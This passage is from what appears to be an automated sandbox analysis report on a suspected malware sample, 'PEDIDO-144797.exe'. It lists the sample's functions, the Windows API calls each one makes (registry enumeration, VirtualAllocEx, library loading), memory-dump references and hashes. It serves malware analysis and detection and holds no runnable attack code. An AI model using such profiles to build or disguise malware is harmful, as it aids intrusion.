                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 334405425-0
                                                                                                                                          • Opcode ID: 44d570d4ef42a6af9798bac81a48d6e43403590213f26621d83d999ce1ed40c7
                                                                                                                                          • Instruction ID: efb744b1bbbaa1f1e58e2693dd3ff93cd36a27706c6aad24c330354b17a2434d
                                                                                                                                          • Opcode Fuzzy Hash: 44d570d4ef42a6af9798bac81a48d6e43403590213f26621d83d999ce1ed40c7
                                                                                                                                          • Instruction Fuzzy Hash: 6F21C531900218EBCF20AFA5CE4CA9E7A70AF04354F60413BF610B61E1DBBD4991DA6E
                                                                                                                                          Function 00401B71 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00401BE1
                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Global$AllocFree
                                                                                                                                          • String ID: Call
                                                                                                                                          • API String ID: 3394109436-1824292864
                                                                                                                                          • Opcode ID: 6a27723cd33979d5ccceb52c727bba02617a76204f9552189d3104983f6bb1b5
                                                                                                                                          • Instruction ID: 81df35259a3df780e2a5f09322996839f14f5544e2eb4a40810e3e9637107665
                                                                                                                                          • Opcode Fuzzy Hash: 6a27723cd33979d5ccceb52c727bba02617a76204f9552189d3104983f6bb1b5
                                                                                                                                          • Instruction Fuzzy Hash: 06218E72A40140DFDB20EB949E8495E77B9AF44314B25413BFA02F72D1DB789851CB9D
                                                                                                                                          Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                                                                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Enum$CloseValue
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 397863658-0
                                                                                                                                          • Opcode ID: 297b237e24fbbf63aa7ca08728d7b3950c3333922afcc1c5b6d3d1192ed08725
                                                                                                                                          • Instruction ID: 4fa2f3c06f6248971957712acf2942ced6ba336c37b2851dfbda8b2cd28c17b0
                                                                                                                                          • Opcode Fuzzy Hash: 297b237e24fbbf63aa7ca08728d7b3950c3333922afcc1c5b6d3d1192ed08725
                                                                                                                                          • Instruction Fuzzy Hash: 6D017171904104EFE7159FA5DE89ABFB6B8EF44348F10403EF105A62D0DAB84E459B69
                                                                                                                                          Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156memoryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • VirtualAllocEx.KERNELBASE(00000000), ref: 1000295B
                                                                                                                                          • GetLastError.KERNEL32 ref: 10002A62
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89705298637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89705275487.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705326435.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89705350965.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AllocErrorLastVirtual
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 497505419-0
                                                                                                                                          • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                                                                          • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                                                                                                          • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                                                                          • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                                                                                                          Function 004031BA Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 004031DF
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FilePointer
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                          • Opcode ID: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
                                                                                                                                          • Instruction ID: 4c6ae7a0626839fce45d877b24888c0af913333af22313e68c4d1644c71cb298
                                                                                                                                          • Opcode Fuzzy Hash: af526002166308cc95fa76d49654f36d838bd7a13899b6376ccfe278c881acad
                                                                                                                                          • Instruction Fuzzy Hash: 3B319C3020021AFFDB109F95ED84ADB3F68EB04359B1085BEF904E6190D778CE509BA9
                                                                                                                                          Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsvE4C5.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseQueryValue
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3356406503-0
                                                                                                                                          • Opcode ID: a3b88ef37a04c447d509aafcd647c8bb55f7a85eb83bcf9e8b78a58130226466
                                                                                                                                          • Instruction ID: 2d27e3624369fee7c217219a4e344138e42523264533ea489648bddc6477d6d2
                                                                                                                                          • Opcode Fuzzy Hash: a3b88ef37a04c447d509aafcd647c8bb55f7a85eb83bcf9e8b78a58130226466
                                                                                                                                          • Instruction Fuzzy Hash: 53119171900209EBEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D7B84A45DB5A
                                                                                                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                          • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                                          • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                                                          • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                                                          • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                                                          Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseDeleteValue
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2831762973-0
                                                                                                                                          • Opcode ID: 3500e27f67e3657d3f13e648c5a4e4955d4a6b8459d35a1d73aadda57e6becb1
                                                                                                                                          • Instruction ID: eeebe11236d86b478005370e27fb04b66889edd8f93d7ff1d49de92df4b57ee5
                                                                                                                                          • Opcode Fuzzy Hash: 3500e27f67e3657d3f13e648c5a4e4955d4a6b8459d35a1d73aadda57e6becb1
                                                                                                                                          • Instruction Fuzzy Hash: 58F09632A04114DBE711BBA49B4EABEB2A59B44354F16053FFA02F71C1DEFC4D41866D
                                                                                                                                          Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Window$EnableShow
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1136574915-0
                                                                                                                                          • Opcode ID: 611feb8e2eb8574bcf65ce6e82aff3c902186df27cfe016bcc5f4eefe149f0e3
                                                                                                                                          • Instruction ID: 353457a250eeab47012712e359045a90ae935b3a48e85cb5936bf3a8ff6902a1
                                                                                                                                          • Opcode Fuzzy Hash: 611feb8e2eb8574bcf65ce6e82aff3c902186df27cfe016bcc5f4eefe149f0e3
                                                                                                                                          • Instruction Fuzzy Hash: 40E09232E08200CFD724DBA5AA4946D77B0EB84354720407FE112F11D1DA784881CF6D
                                                                                                                                          Function 0040678A Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                                                                                            • Part of subcall function 0040671A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                                                                                                            • Part of subcall function 0040671A: wsprintfW.USER32 ref: 0040676C
                                                                                                                                            • Part of subcall function 0040671A: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406780
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2547128583-0
                                                                                                                                          • Opcode ID: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                                                                                                          • Instruction ID: 6fedc38abd16d04710e8a636fd16f84820eabe090bba127bd882252d3fb3e83b
                                                                                                                                          • Opcode Fuzzy Hash: 1fd694bbbc018e5f81eae6ff46d5e7dd0c39e86c0a2cf65890550c3579ed631a
                                                                                                                                          • Instruction Fuzzy Hash: 21E0863250421156D21096745E4893772AC9AC4718307843EF956F3041DB389C35A76D
                                                                                                                                          Function 00405EA2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\PEDIDO-144797.exe,80000000,00000003), ref: 00405EA6
                                                                                                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$AttributesCreate
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 415043291-0
                                                                                                                                          • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                          • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                                                          • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                          • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                                                          Function 00405960 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,00000000,0040347C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77763420,004036D5,?,00000006,00000008,0000000A), ref: 00405966
                                                                                                                                          • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405974
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89701022741.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1375471231-0
                                                                                                                                          • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                          • Instruction ID: a0b70af09676f49ae35af12b400ff138e6ea5c47fed9fef2c083bef2843b0e9d
                                                                                                                                          • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                                          • Instruction Fuzzy Hash: 97C04C71255506DADB105F31DE08F1B7A50AB60751F11843AA18AE51B0DA348455DD2D
                                                                                                                                          Function 004027E9 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                                                                                                            • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.89700560823.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.89700488645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700631140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.89700699832.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
